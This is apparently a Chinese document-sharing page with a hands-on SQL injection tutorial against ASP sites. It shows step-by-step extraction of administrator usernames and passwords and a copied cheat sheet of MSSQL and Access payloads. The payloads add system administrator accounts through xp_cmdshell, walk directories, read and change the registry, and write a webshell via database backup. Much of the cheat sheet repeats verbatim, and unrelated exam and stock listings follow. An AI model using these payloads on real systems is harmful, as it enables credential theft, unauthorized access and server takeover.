手动注入检测
入侵过程主要包括以下几个步骤: 1、测试ASP系统是否有注入漏洞; 2、获取数据库表名; 3、测试管理员ID; 4、测试管理员用户名长度和管理员密码长度; 5、从高到低依次测试出管理员用户名和密码。 测试ASP系统是否有注入漏洞 这很关键,没有漏洞的网站你就别瞎忙了。方法也很简单,打开ASP网站一个分类网页,如盗帅下载系统中的/list.asp?id=11和逸风系统中的/class.asp?id=18等,在其后面分别加入and 1=1 和and 1=2进行测试,具体形式为/list.asp?id=11 and 1=1 (以下各测试语句都用同样的形式加入,TTY将不再说明)注意空格。在IE浏览器里空格将自动转换为%20。如果输入and 1=1 能正常显示原页面内容,输入and 1=2不能正常显示原页面内容,就说明有SQL注入漏洞了,可以进行下面的步骤。测试数据库表名 一个数据库里一般有很多表,我们要找到存放管理员用户名和密码的表。对于已知类型的ASP系统来说,可以到网上去下载一个压缩包,用辅臣数据库浏览器打开数据库查看就可以了,一般都是admin。无论是否知道表名,都加以下语句测试一下: and 0<>(select count(*) from admin) 如果能返回正常页面,说明表名就是admin,否则继续换表名测试。 测试管理员ID 一般网站的管理员不是很多的,ID也不是很大,依次用1、2、3 ... ... 测试,很快 就能测到,具体测试语句为: and (select count(*) from admin where id=1) 变换最后的数字1进行测试,直到能正常返回原页面为止。 测试管理员用户名长度和管理员密码长度 这很重要,不知道用户名和密码是几位数下面的工作就无法进行。 用户名长度: and (select count(*) from admin where id=5 and len(username)=4) 密码长度: and (select count(*) from admin where id=5 and len(pws)=4) 需要注意的是,表里存放用户名的字段username和存放密码的字段pws需要打开数据库进行确认。 最后测试出管理员用户名和密码 从高到低,依次一位一位的测试,直到测出为止: 正在测试用户名的第三位字母 :and (select count(*) from admin where id=5 and left(us ername,3)='ttd') 正在测试第7位密码:and (select count(*) from admin where id=5 and left(pws,7)='1506411') 好了,如果操作无误的话,你就可以测试出正确的用户名和密码了。马上到网上去找一个盗帅下载系统或逸风网站系统练习吧! 对于新手来说,上面的方法可以看成是学习注入原理,实际操作起来是非常累人的,且不说语句是否正确、熟练掌握,单就马拉松式的测试用户名和密码就能累死你,每一位,如果是数字要测试10次,如果是字母要测试26次,如果哪位老兄用户名和密码都用上了!@#$%的话,那你慢
慢去测试吧,哈哈哈哈哈! ------------------------------------- 手动注入脚本命令精华版 作者:未知 来源:http://wendang.chazidian.com 1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ’’=’ 4.搜索时没过滤参数的’and [查询条件] and ’%25’=’ 5.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 6.猜数据库 ;and (select Count(*) from [数据库名])>0 7.猜字段 ;and (select Count(字段名) from 数据库名)>0 1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ’’=’ 4.搜索时没过滤参数的’and [查询条件] and ’%25’=’ 5.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0 access 6.猜数据库 ;and (select Count(*) from [数据库名])>0 7.猜字段 ;and (select Count(字段名) from 数据库名)>0 8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 9.(1)猜字段的ascii值(access) ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 (2)猜字段的ascii值(mssql) ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 10.测试权限结构(mssql) ;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));-- ;and 1=(select IS_MEMBER(’db_owner’));-- 11.添加mssql和系统的帐户 ;exec master.dbo.sp_addlogin username;-- ;exec master.dbo.sp_password null,username,password;-- ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ;exec master.dbo.xp_cmdshell ’net user username password /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;-- ;exec master.dbo.xp_cmdshell ’net user username password /add’;-- ;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;-- 12.(1)遍历目录 ;create table dirs(paths varchar(100), id int) ;insert dirs exec master.dbo.xp_dirtree ’c:/’ ;and (select top 1 paths from dirs)>0 ;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>) (2)遍历目录 ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar (255));-- ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;insert into temp(id) exec master.dbo.xp_subdirs ’c:/’;--
获得子目录列表 ;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- 获得所有子目录的目录树构 ;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:/web/index.asp’;-- 查看文件的内 容 13.mssql中的存储过程 xp_regenumvalues 注册表根键, 子键 ;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’ SOFTWARE/Microsoft/Windows/CurrentVersion/Run’ 以多个记录集方式返回所有键值 xp_regread 根键,子键,键值名 ;exec xp_regread ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’CommonFilesDir’ 返 回制定键的值 xp_regwrite 根键,子键, 值名, 值类型, 值 值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’ TestValueName’,’reg_sz’,’hello’ 写入注册表 xp_regdeletevalue 根键,子键,值名 exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’ ,’TestValueName’ 删除某个值 xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey ’ 删除键,包括该键下所有值 14.mssql的backup创建webshell use model create table cmd(str image); insert into cmd(str) values (’’); backup database model to disk=’c:/l.asp’; 15.mssql内置函数 ;and (select @@version)>0 获得Windows的版本号 ;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa ;and (select user_name())>0 爆当前系统的连接用户 ;and (select db_name())>0 得到当前连接的数据库 16.简洁的webshell use model create table cmd(str image); insert into cmd(str) values (’’); backup database model to disk=’g:/wwwtest/l.asp’; 8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 9.(1)猜字段的ascii值(access) ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 (2)猜字段的ascii值(mssql) ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 10.测试权限结构(mssql) ;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));-- ;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));-- ;and 1=(select IS_MEMBER(’db_owner’));- - 11.添加mssql和系统的帐户 ;exec master.dbo.sp_addlogin username;-- ;exec master.dbo.sp_password null,username,password;-- ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ;exec master.dbo.xp_cmdshell ’net user username password /workstations:*/times:all/
passwordchg:yes /passwordreq:yes /active:yes /add’;-- ;exec master.dbo.xp_cmdshell ’net user username password /add’;-- ;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;-- 12.(1)遍历目录 ;create table dirs(paths varchar(100), id int) ;insert dirs exec master.dbo.xp_dirtree ’c:/’ ;and (select top 1 paths from dirs)>0 ;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>) (2)遍历目录 ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar (255));-- ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;insert into temp(id) exec master.dbo.xp_subdirs ’c:/’;-- 获得子目录列表 ;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- 获得所有子目录的目录树构 ;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:/web/index.asp’;-- 查看文件的内 容 13.mssql中的存储过程 xp_regenumvalues 注册表根键, 子键 ;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’ SOFTWARE/Microsoft/Windows/CurrentVersion/Run’ 以多个记录集方式返回所有键值 xp_regread 根键,子键,键值名 ;exec xp_regread ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’CommonFilesDir’ 返 回制定键的值 xp_regwrite 根键,子键, 值名, 值类型, 值 值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’ TestValueName’,’reg_sz’,’hello’ 写入注册表 xp_regdeletevalue 根键,子键,值名 exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’ ,’TestValueName’ 删除某个值 xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey ’ 删除键,包括该键下所有值 14.mssql的backup创建webshell use model create table cmd(str image); insert into cmd(str) values (’’); backup database model to disk=’c:/l.asp’; 15.mssql内置函数 ;and (select @@version)>0 获得Windows的版本号 ;and use r_name()=’dbo’ 判断当前系统的连接用户是不是sa ;and (select user_name())>0 爆当前系统的连接用户 ;and (select db_name())>0 得到当前连接的数据库 16.简洁的webshell use model create table cmd(str image); insert into cmd(str) values (’’); backup database model to disk=’g:/wwwtest/l.asp’;
下载文档
热门试卷
- 2016年四川省内江市中考化学试卷
- 广西钦州市高新区2017届高三11月月考政治试卷
- 浙江省湖州市2016-2017学年高一上学期期中考试政治试卷
- 浙江省湖州市2016-2017学年高二上学期期中考试政治试卷
- 辽宁省铁岭市协作体2017届高三上学期第三次联考政治试卷
- 广西钦州市钦州港区2016-2017学年高二11月月考政治试卷
- 广西钦州市钦州港区2017届高三11月月考政治试卷
- 广西钦州市钦州港区2016-2017学年高一11月月考政治试卷
- 广西钦州市高新区2016-2017学年高二11月月考政治试卷
- 广西钦州市高新区2016-2017学年高一11月月考政治试卷
- 山东省滨州市三校2017届第一学期阶段测试初三英语试题
- 四川省成都七中2017届高三一诊模拟考试文科综合试卷
- 2017届普通高等学校招生全国统一考试模拟试题(附答案)
- 重庆市永川中学高2017级上期12月月考语文试题
- 江西宜春三中2017届高三第一学期第二次月考文科综合试题
- 内蒙古赤峰二中2017届高三上学期第三次月考英语试题
- 2017年六年级(上)数学期末考试卷
- 2017人教版小学英语三年级上期末笔试题
- 江苏省常州西藏民族中学2016-2017学年九年级思想品德第一学期第二次阶段测试试卷
- 重庆市九龙坡区七校2016-2017学年上期八年级素质测查(二)语文学科试题卷
- 江苏省无锡市钱桥中学2016年12月八年级语文阶段性测试卷
- 江苏省无锡市钱桥中学2016-2017学年七年级英语12月阶段检测试卷
- 山东省邹城市第八中学2016-2017学年八年级12月物理第4章试题(无答案)
- 【人教版】河北省2015-2016学年度九年级上期末语文试题卷(附答案)
- 四川省简阳市阳安中学2016年12月高二月考英语试卷
- 四川省成都龙泉中学高三上学期2016年12月月考试题文科综合能力测试
- 安徽省滁州中学2016—2017学年度第一学期12月月考高三英语试卷
- 山东省武城县第二中学2016.12高一年级上学期第二次月考历史试题(必修一第四、五单元)
- 福建省四地六校联考2016-2017学年上学期第三次月考高三化学试卷
- 甘肃省武威第二十三中学2016—2017学年度八年级第一学期12月月考生物试卷
网友关注
- CCI背离-买了就涨 一涨就停
- 股票指标公式编辑基础知识(一)
- 股票交易指南
- K量三态分析方法
- 基于引入技术指标的Elman网络的股市预测
- 选股要点
- 如何判断是主力买还是散户买
- 灵活应对股价破位技巧
- 主板选购必看_新技术功能趋势指南
- 股票技术指标图文详解大全(可编辑)
- 实战技巧 七招选定飙升股
- 如何捕捉暴涨股
- [宝典]股票操纵很简单
- 股票“t+0”的两大手法
- 股票实战:千万不要忘记跌势中的教训
- 散户交易盈利的机械化操盘方法
- 股票:如何快速看盘
- 股票入门基础知识,炒股票资料
- 金钥匙大智慧版使用说明
- 涨幅30倍以上大牛股的特点
- 股市经典头部形态
- 疯狂跌市中稳定心态的六种技巧
- 第六章 技术指标
- 股票T+0操作技巧
- 如何选强于大盘的强庄股
- 股票实战:跟庄技巧解析
- 股票:巧用“皮球”理论抢反弹
- 股票:画线实战
- 关于技术
- 炒股技巧
网友关注视频
- 【部编】人教版语文七年级下册《泊秦淮》优质课教学视频+PPT课件+教案,广东省
- 飞翔英语—冀教版(三起)英语三年级下册Lesson 2 Cats and Dogs
- 北师大版小学数学四年级下册第15课小数乘小数一
- 30.3 由不共线三点的坐标确定二次函数_第一课时(市一等奖)(冀教版九年级下册)_T144342
- 19 爱护鸟类_第一课时(二等奖)(桂美版二年级下册)_T502436
- 沪教版八年级下册数学练习册21.4(1)无理方程P18
- 二年级下册数学第二课
- 3.2 数学二年级下册第二单元 表内除法(一)整理和复习 李菲菲
- 沪教版八年级下册数学练习册21.3(3)分式方程P17
- 冀教版英语三年级下册第二课
- 七年级英语下册 上海牛津版 Unit3
- 冀教版英语四年级下册第二课
- 七年级英语下册 上海牛津版 Unit5
- 【部编】人教版语文七年级下册《泊秦淮》优质课教学视频+PPT课件+教案,湖北省
- 《小学数学二年级下册》第二单元测试题讲解
- 化学九年级下册全册同步 人教版 第25集 生活中常见的盐(二)
- 外研版英语三起5年级下册(14版)Module3 Unit2
- 【部编】人教版语文七年级下册《泊秦淮》优质课教学视频+PPT课件+教案,天津市
- 每天日常投篮练习第一天森哥打卡上脚 Nike PG 2 如何调整运球跳投手感?
- 沪教版八年级下册数学练习册21.3(2)分式方程P15
- 沪教版八年级下次数学练习册21.4(2)无理方程P19
- 二年级下册数学第一课
- 苏科版数学 八年级下册 第八章第二节 可能性的大小
- 冀教版小学数学二年级下册第二单元《有余数除法的竖式计算》
- 冀教版英语五年级下册第二课课程解读
- 【部编】人教版语文七年级下册《过松源晨炊漆公店(其五)》优质课教学视频+PPT课件+教案,江苏省
- 沪教版八年级下册数学练习册一次函数复习题B组(P11)
- 精品·同步课程 历史 八年级 上册 第15集 近代科学技术与思想文化
- 沪教版牛津小学英语(深圳用) 四年级下册 Unit 8
- 河南省名校课堂七年级下册英语第一课(2020年2月10日)
精品推荐
- 2016-2017学年高一语文人教版必修一+模块学业水平检测试题(含答案)
- 广西钦州市高新区2017届高三11月月考政治试卷
- 浙江省湖州市2016-2017学年高一上学期期中考试政治试卷
- 浙江省湖州市2016-2017学年高二上学期期中考试政治试卷
- 辽宁省铁岭市协作体2017届高三上学期第三次联考政治试卷
- 广西钦州市钦州港区2016-2017学年高二11月月考政治试卷
- 广西钦州市钦州港区2017届高三11月月考政治试卷
- 广西钦州市钦州港区2016-2017学年高一11月月考政治试卷
- 广西钦州市高新区2016-2017学年高二11月月考政治试卷
- 广西钦州市高新区2016-2017学年高一11月月考政治试卷
分类导航
- 互联网
- 电脑基础知识
- 计算机软件及应用
- 计算机硬件及网络
- 计算机应用/办公自动化
- .NET
- 数据结构与算法
- Java
- SEO
- C/C++资料
- linux/Unix相关
- 手机开发
- UML理论/建模
- 并行计算/云计算
- 嵌入式开发
- windows相关
- 软件工程
- 管理信息系统
- 开发文档
- 图形图像
- 网络与通信
- 网络信息安全
- 电子支付
- Labview
- matlab
- 网络资源
- Python
- Delphi/Perl
- 评测
- Flash/Flex
- CSS/Script
- 计算机原理
- PHP资料
- 数据挖掘与模式识别
- Web服务
- 数据库
- Visual Basic
- 电子商务
- 服务器
- 搜索引擎优化
- 存储
- 架构
- 行业软件
- 人工智能
- 计算机辅助设计
- 多媒体
- 软件测试
- 计算机硬件与维护
- 网站策划/UE
- 网页设计/UI
- 网吧管理